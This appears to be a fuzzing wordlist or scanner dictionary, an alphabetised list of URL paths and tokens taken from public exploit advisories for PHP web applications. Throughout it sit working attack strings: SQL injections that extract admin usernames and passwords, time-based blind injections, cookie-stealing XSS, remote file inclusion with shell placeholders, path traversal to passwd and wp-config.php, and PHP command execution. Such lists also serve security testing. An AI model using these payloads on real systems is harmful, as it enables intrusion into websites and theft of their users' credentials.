eproject_basic_view_menu.php?system_path=[evil_scripts]
eproject_layoutclass.php?system_path=[evil_scripts]
eproject_layoutelementclass.php?system_path=[evil_scripts]
eproject_layoutelement_view_init.php?system_path=[evil_scripts]
eproject_projectclass.php?system_path=[evil_scripts]
eproject_projectelementclass.php?system_path=[evil_scripts]
eproject_projectelement_model_update.php?system_path=[evil_scripts]
eproject_project_model_create.php?system_path=[evil_scripts]
eproject_project_view_combi.php?system_path=[evil_scripts]
eproject_project_view_create.php?system_path=[evil_scripts]
eproject_project_view_listactive.php?system_path=[evil_scripts]
eproject_project_view_listclosed.php?system_path=[evil_scripts]
[EPS_path]
eqdkp
equipeinfo
equip_profiles.add-edit.php
equip_profiles.list.php
er
e-rdc.org
ereignis.php?Modus=List&Page=1"><script>alert('y3nh4ck3r+was+here!')<
erek
erek_basic_view_menu.php?system_path=[evil_scripts]
erek_compcauseclass.php?system_path=[evil_scripts]
erek_compclass.php?system_path=[evil_scripts]
erek_compcountryclass.php?system_path=[evil_scripts]
erek_compdecisionclass.php?system_path=[evil_scripts]
erek_compdepartmentclass.php?system_path=[evil_scripts]
erek_comp_model_caseawait.php?system_path=[evil_scripts]
erek_comp_model_caseclose.php?system_path=[evil_scripts]
erek_comp_model_casedone.php?system_path=[evil_scripts]
erek_comp_model_caseopen.php?system_path=[evil_scripts]
erek_comp_model_create.php?system_path=[evil_scripts]
erek_compsolutionclass.php?system_path=[evil_scripts]
erek_compunitclass.php?system_path=[evil_scripts]
erek_comp_view_combi.php?system_path=[evil_scripts]
erek_comp_view_create.php?system_path=[evil_scripts]
erek_comp_view_listactive.php?system_path=[evil_scripts]
erek_comp_view_listawait.php?system_path=[evil_scripts]
erek_comp_view_listclosed.php?system_path=[evil_scripts]
erek_comp_view_listdone.php?system_path=[evil_scripts]
erek_comp_view_search.php?system_path=[evil_scripts]
e_reserv
erfurtwiki.sourceforge.net
erorr
err
err0rgroup.org
<\?error
Error
_error_funcs.php?MOA_PATH=[AvriLhea]
error.inc?ERROR_CODE=601&ERROR_MESSAGE=123
error_log
error_log',
error_log",
error_log",          #...
error_log","
error.log
error.log',
error.log",
error_log%00
error_log%00' 
error_log%00",
error_log%00","
error.log%00 
error.log%00",
error_log%00&cmd=ls+-lisa
error_log.php
error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
error_log.php?err_type='UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
error_log.php?err_type='UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23
error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
error_message.php?access_denied&id='><script>alert(document.cookie)<
error_message.php?access_denied&id='[SQL-inj]
error.php
error.php?">
error.php?default_path=[evil_scripts]
error.php?ec=13&last_message=%3Csc%3Cscript%3Eript%3Ealert%281%29%3C
error.php?err=200&uname=victim&email=attacker@example.com
error.php?f_pass=blackybr&sess[auth]=1&selected_theme=..
error.php?html_error_occurred=<script>alert(document.cookie)<
error.php" method="POST">
error.php?newlang=foobar
error.php?<?passthru($_GET[cmd]);?>
errors.php?error=[Evil_Code]
error_view.php?ID=-99+UNION+SELECT+1,2,3,password,username,6,7+from+admin_users
error_view.php?ID=[SQL]
es
esa
escms
esCMS Alpha
escort_agency
escort-agency-cms
escort-design
escort-profile.php?modelid=13'[Blind-SQL]
escorts-directory
escort-service-begleitagentur-v10-p-211.html
escribir.php?domus=ae29cf4d3f2dc42241e387d39b4126e2&hilo=1&padre=1&categoria=General&n=&usario=username&email=e@\';%20alert(123);%20var%20dss=\'h.co&asunto=blabla&texto=anytext&accion=enviar 
es_custom_menu.php?files_dir=[evilCode]
es_desp.php?files_dir=[evilCode]
esector-news
esev2versions
EsFaq
eshop
eshop-manager.23.html]
eskolar
es_mx
es_offer.php?files_dir=[evilCode]
esqueletos
essay.php?essaycategory='
essentials
Estadisticas.php?pais=-1%27%20union all select id from pharming--
estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281
estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281";;
estafresgaftesantusyan.inc
estate
estateagent.php?mosConfig_absolute_path=shell
estilo
E-Store
esupport
esvon_cl_3_0_demo
eswap
esyndicat.org
etc
  etc
etc&filename=passwd
etc&theme=passwd%00
etemplate.php?id=[SQL injection]
e-ticketing
etomite
etraining
eula
euploader.html
eurohackers.it\n";
eurowards.org
eval.php';
evalsite
evaluation
evarisk
eve_edit.php?m=November&y=2012&d=20
event
eventcal
eventcal2.php.php?path_simpnews=
event-calendar-software.html )
event.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
event_desc.php?es_id=4[CODE]
event_detail.php?event_id=-1 UNION SELECT
event_detail.php?event_id=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7
event-details.php?id=223'+select+username,password+from+users
eventdisplay.php?id=1+and+1=2+union+select+concat(uid,0x3a,username,0x3a,password),2,3+from+pec_users
eventdisplay.php?id='"()%26%251<ScRiPt
eventform.php?id=1+and+substring(@@version,1,1)=5
eventform.php?id='"()%26%251<ScRiPt
event_handler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
/?event_id=[inj3ct C0dE]
eventify
eventimages
event_info.php?eventID=-9999
event_info.php?eventID[SQL Injection]
eventi.php?read=-999+union+select+1,2,group_concat(concat(username,0x3a,password,0x3a,email) separator 0x3c62723e),4,5+from+utenti--
event_list.php"))))
eventlog.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`shadm`@`localhost` trigger ins_trig after insert on eventlog\\nfor each row\\nbegin\\nINSERT INTO users VALUES("muts","21232f297a57a5a743894a0e4a801fc3","NULL","4773","2","3","N
eventmanager
event.php?CeTi=<
event.php?Contact=<script>alert('LOL')<
event.php?Description=<script>alert('LOL')<
event.php?font="><script>alert('LOL')<
event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
event.php?ID=(1=1) [SQL]
event.php?id=[SQL]
event.php?ShowAddress=<script>alert('LOL')<
event-registration
event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
events
events2
events-calendar
events-calendars
Events-Calendar-WebBiscuits-46424.html
events_clndr_view.php?id=1 and ascii(substring((select concat_ws(0x3a,name,password) from user where name='Mike'),1,1)) =77
events_clndr_view.php?id=1 and ascii(substring((select concat_ws(0x3a,name,password) from user where user_id=1),1,1)) between 1 and 200
events_clndr_view.php?id=1 and ascii(substring((select password from user where name='Mike'),1,1)) between 97 and 103
events_clndr_view.php?id=1 and substring(@@version,1,1)=4
eventscriptphp
eventscript.php )
eventscript.php?id=-1'[SQL-INJECTION]--
eventscript.php?p=-1'[SQL-INJECTION]--
eventscroller.php?path_simpnews=
events.inc.php?lang_path=[cmd_url]
Events_Locator
events-manager-extended
events.php?action=show">
events.php?c='
events.php?c=%27
events.php?cat_id=[BLIND SQLi]           1
events.php?f=incoming&c='
events.php?f=incoming&c=%27
events.php?idevent=-1
events.php?sel=edit_event&id_event=5
events-registration
events_uadd.php
events_view.php?eid=69'
eventum
eventviewer.php?endDate=";<script>alert(document.cookie)<
eventviewer.php?logLevel=1,1)%20union%20SELECT%20id%20FROM%20testplans%20%23
eventviewer.php?logLevel=";<script>alert(document.cookie)<
eventviewer.php?startDate=";<script>alert(document.cookie)<
event_view.php?eid=34 UNION SELECT pass FROM 
event_view.php?eid=34 UNION SELECT userid 
EventView.php?event_id=[SQL]
eventy
eventy.127.0.0.1:8080
eventy.php?selyear=&selmonth=&event_id=-1869+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13--%20->
eventy-plus
eve-nuke
evil
evil?
evil?								 
Evil ** 2 Find Evil
evilboard
EvilBoard_0.1a
evilcode
EVILCODE?
evilcode?&cmd=
evilcode.html
evilcode.js<
evilcode.php
evil_cookie_logger.cgi?'+document.cookie<
evil?"+escape(document.
[evil file]
[Evil File]
[Evil_File]
" . ($evilfile =~ m
evilfile.php
evilfile.php&check=0&email[to]=+%3C%3Fphp+include%28%24evil_include%29%3B+%3F%3E+
<evilh4x0rscript>
evilhost
[evil host]
[evilhost]
evil-host
evil.host
[evilhost]&cmd=ls
[evilhost]&cmd=ls 
evil.js><
evil.js' style="display:none;"
evil.mp3
evil.org
[evil].(php)
evil.php
evil.php> 
evil.php? 
Evil.php
evil.php'%23
evil.php&cmd=ls%20-al
evil.php.jpg
evil.php (To Find Evil)
evil.ru
[Evil_scr
evilscript
[evil_script]?
evil_script
evil_script ?
evil_script?
evil[script]
evilscript 
evilscript?
[Evil_script]
Evil-script?
evilscript.php%00 (this requiers magic_quotes_gpc to be disabled)
[evil script.php.bmp.php]
[evil scripts]
evil_scripts
evil_scripts ?
evil_scripts?
evilscripts ?
evilscripts?
evilscripts?]
evilsentinel.altervista.org
evilserver
evilsite
[evil site]
[evil_site]
[EvilSite]
evilsite.tld
evilurl
evil.xxx
evilzone.org
evision
e-vision
eVision-2.0
(Ev!l name.php)
ev!l.php
Ev!l.php * 2find it
evoBBv0.3.htm     
evotopsites
ewiki
ewiki-R1.02b.tgz
exam                                           |
example
Example
example1.php?subaction=showfull&id=<script>alert(document.cookie);<
example2.php?subaction=showfull&id=<script>alert(document.cookie);<
example.com localshell.php
example.de
example.html\r\n";
example.jpg
example.org
example.org with
[example.php]
example.php
example.php?gallery_category=-1%27+UNION+ALL+SELECT+1,concat(name,0x3A3A3A,value)+FROM+st_settings+WHERE+id=2
example.php?gallery_category=-1%27+UNION+ALL+SELECT+'<HTML><title>SHELL BY --Y3NH4CK3R--><
example.php?gallery_category=1&gallery_show=-1%27+union+all+select+1,version(),database(),4,5,6
example.php?gallery_category=1&gallery_show=-1%27+UNION+ALL+SELECT+'<HTML><title>SHELL BY --Y3NH4CK3R--><
example.pt
examples
examplesite
example_site
examples.php HTTP
examples.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
Example_Target
example.tld
example-view
excel
exception
ex_date.php?id=-595+union+select+version%28%29,database%28%29,3,4,user%28%29--%20->
exec
exec.php3?cmd=[COMMAND] 
exec.php&action=filter&filled=1&whichtype=categories
exec.php" method="post">
ExecuteOrderPage.class.php?base_path=[evil_scripts]
execute.php?text=%3Cli%3E
execute.php?text=%3C?php%20system(%22ls%22);
exemple
exercises_details.php?exo_id=-1
exercises_details.php?uInfo=-1$sqli HTTP
exerocms
Exero_CMS_1-0-1.rar
Ex-guestbook.rar
exhibitors.php?theme=..
exifer
[existing_file]
exit>;
";exit(-1); }
exit.php?url=DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb
exp
expanded.php?conf=..
expdb.cc
expert
experts
[experts_path]
' . $exp->GLOBALS['host'] . $exp->GLOBALS['path'] . 'albums
ExpiredDomainsPage.class.php?base_path=[evil_scripts]
explay.localhost
exploit
$exploit";
exploit 
Exploit
 [ EXPLOIT ]
exploita.altervista.org
exploitalert
exploit.co.il              #"
exploit.co.il             #"
"+exploit, data, headers)
 Exploited !
 Exploited ! database saved to c:
Exploit#exploit-LRCF-v3.4.rar
exploit.htm
exploit.js
exploit.js"; var evil = document.createElement('script'); evil.src = url; document.body.appendChild(evil);})();
exploit.php
exploit.php[
exploit.php?1=1[
exploits
exploits-vulnerabilities-pocs
explorecrew.org
explorer
explorer.cwm-design.de
explorerdir.php?name=C:
explorerdir.php?name=C:\Program Files
explorerdir.php?name=[directory]
explorer.php?folder=..
explorer.php?wdir=
'.$expl_url);
expo
exponent
exponentcms
exponent-cms
exponentcms.org
exponent_site
export
Export.csv
exportData.php?dirPath=..
export_handler.php?gfplugins=[Shell]
export.php?
export.php"
export.php?export_to=..
export.php?ex=user&us=dummy&de=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
export.php?ftype=
export.php?gfplugins=[Shell]
export.php?homep=RFI
export.php?path=[EV!L]
export.php?what=..
exportProductListing?productStoreId=90100"
ExportProjectSearchQuery.class.php?gfcommon=[Shell]
exporttocsv.php?did=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
expose
express.php HTTP
ext
extadminmenus.class.php?mosConfig_absolute_path=[attacker]
extauthnobody.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
extauth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
extcal
extcalendar.php?mosConfig_absolute_path=[attacker]
extend
extend-wordpress
extension
extension_manage
Extension.php?_ENV[asicms][path]=
extensions
extensions.joomla.org
extensions.joomlashop.dk
extensions.php?sortby=1
extensions.php?sortby=SLEEP(5)%23
external
external_blog_edit.php
ExternalHtmlSearchRenderer.class.php?gfwww=[Shell]
external_md5($src);
external.php?lang=..
external.php?url=include your fucken evil shell
externalsearch
ExternalSearchEngine.class.php?gfwww=[Shell]
externalsearch-init.php?gfplugins=[Shell]
ExternalSearchPlugin.class.php?gfwww=[Shell]
external_vote.php?lang=[LFI]
ext.joom.ru
). eXtplorer is released
extplorer.sf.net
extplorer.sourceforge.net
extra
extracts.add-edit.php
extracts.list.php
extractwebsite
extranet.php?p=member-area [vulnerable : name] 
extrapage.php?cat_id=-1'[SQLi]
extrapage.php?cat_id=[sqli]
extras
extratabs
extratabs-init.php?GLOBALS[sys_plugins_path]=[Shell]
extreme-fusion.pl
exv2_2043_sql.html
eyeos
ez_blog
ez-blog
ezcart_demo
ezcms
ez_gb
ezhttpbench.php?AnalyseSite=
ezi
ezine18
ezine.echo.or.id
ezinfo
ez.no
ezPack
ezphotogallery
ez_publish_3_9
ezpx-1.2-beta
ezpx.org
ezrole.php 
ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible
ez_sql.php?lib_path=[evil_code]
ezt
ezw
ezwebalbum
ezwebin_site_admin
f
 -f
f0rum
f1b6b4d587ab
f22
f265961d0646890c9efe05b93983124abc18c56e
F3Site_path
f5
fa
Fa-Ads
face
facebook.gif' .'" 
facebook-opengraph-meta-plugin
facebook-profile-link-on-postbit-2-2
facil
facil-cms
facilcms.org
[FacilePath]
facilhelpdesk.html
facility
facil-settings.php?FACIL_THEME= [rfi shell]
facts
factux
Factux
fag
FaHome
fail
failedlogins.log
fain182.badroot.org
fake_config_page<script type="text
falconcms
falla_en_el_mod_seo4smf_para_smf-t241029.0.html
false
False
 False ,,
*		False
falt4
falt4_cms_security_report_advisory.html
famarket
FaMarket
fam-connections
Family%20Connections
familynews.php?current_user_id=[shell]
familynews.php?getnews=-9999
familynews.php"  id="ChangeSubmit">
familyproject
famp3
faname
fancy-gallery-wordpress-plugin
Fancy_NewsLetter
FANCYNLOptions.php?module_name=[Lfi]%00
fancyupload
fantastico
faq
faqadmin
faqadmin-current.tgz
faq_details.php?flag=q&id=1'
faq_details.php?flag=q&id=[sql]
faqengine.php?lang=en
faq.html 
faqman
faq_manager
[faq_manager_path]
FAQMasterFlex
faqmasterflex.php]
faq.php?action=&type=view&s=&id=[SQL]
faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1
faq.php?article=105'
faq.php?cat=1[SQL] 
faq.php?cat=45'
faq.php?catid=[SQL Injection]
faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin--
faq.php?faq_categ[0][title]=
faq.php?faq_categ[0][title]=<script>alert(123);<
faq.php?faq_categ[0][title]=test&faq_categ[0][flag]=1
faq.php?faq_categ=1
faq.php?faq_categ[999][title]=<script>alert(123);<
faq.php?farea=%22%3E%3Cscript%3Ealert(document.cookie)%3C
faq.php?id=SQL_CODE
faq.php?lang=[File-To-Require]%00
faq.php?myfaq=ys&id_cat=99&categories=<script>alert()<
faq.php?path_faqe=[INDONESIANCODER]
faq.php?print=true&cat_name=cinema&category_id=[validid][SQL
faq_qanda.php?id=[SQL] 
faqs
faqscript
FAQ-script-features.php   
FAQ-script-features.php   $
faqs-manager
faqsupport
Farsi1
[farsinews_path]
fast_faq
fastlinks.php?catid=[SQL]
[fastpublish_path]
fatcoder
faupload
Faupload-41231.html
favicon.ico" type="image
Faweb2.NulL.bY.Eh3an.FaScript.Product
fbActivate.php?action=activate&name=test&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
fb.me
fbpromotions
fcard
/?__f=category&node=[SQL]
fc_cms_rce_adv.html' ],
fck
fckeditor
fckEditor
FCKeditor
FCKEditor
fckeditor_22_xpl.html)
fckeditor251
fckeditor2rc2
fckeditor_dialog_image.php?file_id=10572&dialog=..
fckeditor-init.php?gfplugins=[Shell]
fckeditor.net) which has fixed
fck.rar
[f*ckscript]
fck_spellerpages
fclick
fcms
FCMS
FCMS_2.2.3
FCMS_2.7.2
fcms_2.9
FCMS_2.9
fcms_users
fcms_users--
fcms_users&newsid=2
fcring.php?s_fuss=[SHELL]
fctadmin.php
/?fct=delete&p=..
fctform.php
/?fct=preview&p=..
fctscr.php
fdcl
f_down.php?dn_path=
fdproweb
featured_article.php?mode=detail&page=&artid=-109+union+select+0,0,0,0,concat_ws(0x3a,username,admin_password),0,0,0,0,0,0,0+from+admin--
featured_article.php?mode=detail&page=search&artid=-1
featured.inc.php
featured.inc.php?install_root=[Shell]
featured-joomla-extensions
featured_list.php?view_mode=..
featured_photos.php?browse=1[SQL]
features
features_boxes.php?gfcommon=[Shell]
features.http-auth.php
features.php \0_o
federated_logon
fedex_v7
~fedro
feed
feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=
feedback.php?user_id=1 << and 1=0
feedback.php?user_id=368+union+select+1,2,3,version(),5,6,7,8--#footer
feedback_report.php?variable[]=1) UNION SELECT 1,2,3,4,username,6,7,8,9,password FROM users -- 
feedcms
FeedCms
FeedCms1.07.03.19Beta.rar
feeding.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
feed-on-feeds
feed.php?cat='
feed.php?topic=0%20UNION%20SELECT%201,user_email,3,4,5,user_login,7%20FROM%20wp_users%20%23
feed.php?topic=1%20union%2
feed-proxy.php?feed=http..
feeds
Feeds
feeds.php?name=articles&id=<SQL>
fee_setting.php
fees_info.inc.php?install_root=[Shell]
feindura.org
fem
fereidani
fereidani.ir         *
festengine.org
festos
fetcheventdetails.php
FetchFile.aspx?doc=simpleblog3.rar
fetch.php?
fetch.php?page='
FEU_DESTINATION_DIR
fex
fez
&ffile=[file]&opmod=open&op=
&ffile=[username].php&opmod=open&op=
Ffm
ffmpeg.php?action=thumb">here<
fgallery
fg-gsm
fh54.de
fhimage
ficha.php?id_establecimiento=-13%27+UNION%20SELECT%201,2,3,4,5,6,concat(@@version,0x3a,user(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+admin
fiche.php?action=create&actioncode=AC_RDV&contactid=1&socid=1&backtopage=..
fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
fiches
fichiers
fid2508A4F431485FD5A1154465381E69E592D8D005.aspx?s=require
field
fieldinfo.php?idfield=[SQL]
FieldManager.php?path=<File Inclusion>%00
fields
file
 && $file !~ 
/?file=.
[file
[ file ][
[file]
[file]?
[file]? 
&file=..
file 
File
[File]
File 
FILE
[file]\0
[file]%00
file%00
[FILE]%00
FILE%00
file%00&type=djs
/?file=1
/?file=2
File%20Editor
fileadmin
filebase
filebase.php?action=freigeben&id=[SQL-STATEMENT]
..&file=boot.ini
filebrowser
fileBrowserInner.php?APP[path][core]=[evil_scripts]
 -file c99shell.php
&file=[code]
 -file config.php
file_content_disclosure_in_grand_flash_a
 -file cshell.php -proxy localhost:8118');
 -file cshell.php -proxy localhost:8118\n\n";
filedb
) <file> (defaults to typo3conf
      file_disc 
 file_disc
 [file disclosure]
      file_disc\n";
filedload.php?file=filedload.php
filedownload
filedownload.php
/?file=downloads.html&label=Downloads
/?file=duhokforum-1.1
file_editor.php";
file.ext
file.ext%3f
file-fetch
file-groups
file.html
file.html:
file.html? key=value
&file=<IFRAME SRC="index.html">
file_image_14
[FILE INCLUDE VULNERABILITY!]
file_info
file_io.php
file_io.php" method="post" onSubmit="return chk()">
/?file=kop2.php
filelist
filelist.class.php?system_path=[evil_scripts]
filelist.datatype.php?system_path=[evil_scripts]
fileloader.php?config[openi_dir]=[url_inclusion_exploit]
file-management
file_management.php?DIR=
filemanager
file_manager
FileManager
file_manager.php
filemanager.php?mod=&op=&dir=
filemanager.php?type=edit&dir=
fileman_file_delete.php?fn=..
fileman_file_download.php?fn=..
fileman_file_download.php?fn=includes
fileman.php
fileman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
filemgmt
&file=Moved%20<a%20href='?'%20onMouseover='alert(document.cookie)'>Here%20<!--
filename
<filename>
'.$filename;
"file name"
 ( File Name )
 (File Name)
'.$filename.'%00';
[FILE NAME]%00      #
[FILE NAME]%00&language=ircrash
".$filename.chr(0x00))." HTTP
filename?cmd=command
filenamehere
[filename].inc?c=cat%20
[filename].inc?c=cat%20..
[filename].inc?c=ls%20-la
[FILENAME][Nullbyte]
filename.php?cmd=ls -la<
' +filename+ '.php?cmd=uname -a;id')
[filename].php?user_inc=..
&filename=wp-config.php&action=download
Filename <---Your File Name\r\n";
file_new.php?link_id=1065
FILE][NULL-Byte]
FILE (or your select)
file_overview.php?link_id=1005'asdf 
[File]+[Param]+[Session]&[QID]=87' order by 15--
[file].php?
file.php
file.php                                                 #
file.php">
file.php%00.jpg
file.php%00" method="post" name="main">
file.php?0,file=8,filename=script.htc);]Sysdream
file.php?0,file=9,filename=script.xml#mycode);]Sysdream 
file.php5", "r");
file.php?action=voir&id=-9'UNION%20SELECT%200,0,0,US_pseudo,0,US_pwd,0,0,0,0%20from%20pphp_user
file.php?APP[path][core]=[evil_scripts]
file.php?class_path=[EV!L]
file.php?cmd={$cmd}");
file.php?cmd=rm%20file.php");
file.php?cms_id=4&name=logo&type=text
file.php?file=..
file.php?id=115&filecat=&eintrag=
file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users
file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers
file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers
file.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11        #
file.php?id=-54
file.php?id=-670
file.php?id=null[SQL]
file.php?id=[sql]
file.php?id='+union+select+1,2,3
file.php?recordID=[ t o p S q l ]
file.php?recordID=xx+union+select+1,group_concat(id,0x3a3a,nom,0x3a3a,pass),3,4,5,6,7,8,9,10+from+mombre--
file.php URL:
FileProcessingScripts
/?file=products
files
_files
[files]
Files
files (2 find)
files.download
file_selector.php
file_select.php?msg=<hostile code>
FileServer.php?src=..
files.htm
files.html
files_lgpl
file.sourceforge.net
file_source.php?file=public
files.php
files.php?cat='&sort 
files.php?do=extension&go=add' method='POST'>
files.php?file=..
files.php?file=.logs
files.php?footer_prog=[Evil_Script]
files.php?header_prog=[Evil_Script]
files.php?mode=download&file=..
files.php?pid=52
file_src
files.soa.org
FileStore.php?_ENV[asicms][path]=
filestream
files.xml?action=delete&file=
files.xml?action=download&file=
filesystem
filethingie
[file-to-read]%00
filetoupload"
filetransfer
filetransfer{$rtl}.css" 
fileup
fileUpload
file_uploader
file_uploader.php
fileuploader.php?dir=..
File upload error
fileUpload.lib.php
[file upload name]
fileupload.php
file-upload-script.html
fileviewer.php?file_id='
fileview.php?album=..
fileview.php?album=[file]%00
filexpress
Filezilla.php?pag=-1%27%20union all select id from pharming--
filldisc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
filler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
fillform.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
Film
filmis
filmlist.php?idfestival=7 (SQL)
filter
/?filter_order=1,&filter_order_Dir=yehg.net.BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB,&limit=3&limitstart=4
/?filter_order=yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAA,&filter_order_Dir=2&limit=3&limitstart=4
filter.php?dbtable=Games&dbfield=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B<
Filter.php?path=<File Inclusion>%00
filter.php?sid=-1 or 1=1-- (true)
filter.php?sid=-1 or 1=2-- (false)
filter_prefs.php?html_filter_select=<script>alert(document.cookie)<
Filters
fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--
fims
Final
Final%20version%20%28Stable%29
findagent.php?country1=<script>alert(
findagent.php?country1=&state1=&city1=<script>alert(
findagent.php?country1=&state1=<script>alert(
findagent.php?page='
FindGeneric?entityName=AccommodationClass\<script>
finding-0days-in-web-applications
findip
Find it from file:plugins
findnotconnectable.php?action=sendpm
find.php?act=action&reset=yes&detail%5B%5D=[SQL]
find.php?page=0&act=action&orderby=sortorder&orderdir=[SQL]
find.php?page=0&act=action&orderby=[SQL] 
findReplace.php
[FireAnt1.3]
fireconfig
firefox
FirePack
firestats.cc
firmworx.sourceforge.net
firstlastnames-plugin
fiscalyears.php
fishcart.org
fishcart_snap_2007_08_03
fishcart_snap_2007_08_03.tgz
fisheye
fix_content.php?submit=Submit">[code]
fixed_page.asp?id=[SQL Inj.]
fixes
fixes.trex-online.net
fixscripts
fizzmedia.negativekarma.net
f.js">Alper&lt;
fklar.pl
fl0rix
flaber
flash
Flash
flash-album-gallery
Flashchat.rar.html
flash-gallery-arbitrary-file-upload
flash-magazine-deluxe
flash-magazine-deluxe-description.html
flashPlayer
flashquiz
flash_upload.php?modelid=1+order+by+19--    (TruE)
flash_upload.php?modelid=1+order+by+20--    (false)
flash_upload.php?modelid= EV!L INJECT!ON
flatnuke
flatnuke256_xpl.html
flatnuke3
[flatnuke3_path]
flatnuke_shell.php.info
flatnuke.sourceforge.net
flatnux
~flatnux
flatnux.altervista.org
flatnux_ost.php style="visibility:hidden;width:0px;height:0px"><
[flat_php_board_path]
[flat_php_board_path]index.php?a=topic&topic=..
[flat_php_board_path]index.php?a=viewprofile&username=..
flatpress
fld
flex
flexadmin
flexbb v0.6.3 beta
flexcms-multiple-csrf-vulnerabilities.html
flexfm
flexphpdir
flexphpic
flexphplink
flexphplinkproen
flexphpsite
flex_trial)
flinx
flinx.rar.html (Nulled)                         
flippingbitbot
flipsource";
flirt
flmnetworkuserbar494abfyb2.png[
florist
fluorine
fluxbb
fluxbb" 
fluxx
flv
flx
flyers
flyhighcms
flymusic.co.uk
flypage&product_id=1011'
flypage&product_id=1087'
flypage&product_id=-3'+UNION+select
flypage.tpl.html]
flyspray-0.9.9.6
flyspray.org
fm
fmoblog
fm.php">
fm.php?action=download&filename=..
fm.php?action=download&filename=passwd&pathext=pub
fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext=                                    #
fm.php?edit=..
fm.php" enctype="multipart
fm.php?GLOBAL[template]=LFI
fm.php?u=[UserName]
FMyClone%20V2.3
FMyClone V2.3
fndatabase
FNews
foafgen
fobuc
focus_sis
Focus_v1.0_path
Focus_v2.2_path
foecms
fog
fog.daviveno.org
foing.sourceforge.net
folder
[folder]
$folder
folder 
Folder:? 
folder-create.php3?BSX_LIBDIR=<br>"
folderdel_.asp?inpCurrFolder=C:\InetPub\wwwroot\
folder-delete.php3?BSX_LIBDIR=<br>"
folder-empty.php3?BSX_LIBDIR=<br>"
foldergallery.jv2.net
folder" method="post" name="main">
[foldername]
[Folder Name]
foldernew.asp?inpCurrFolder=c:\inetpub\wwwroot\&inpNewFolderName=test2008
 [folder parameter]
folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11# #+from+users--#
folderprops.php?_PM_[path][handler]=[Evil_Script]
folder-rename.php3?BSX_LIBDIR=<br>"
folders.html?id=[sessionid]&folderold=....
folders.php3?BSX_LIBDIR=<br>"
folders.update.php?cmd=mark&folderid=0%20--%20%22);phpinfo();@ob_start(%22
folder_z_kgb
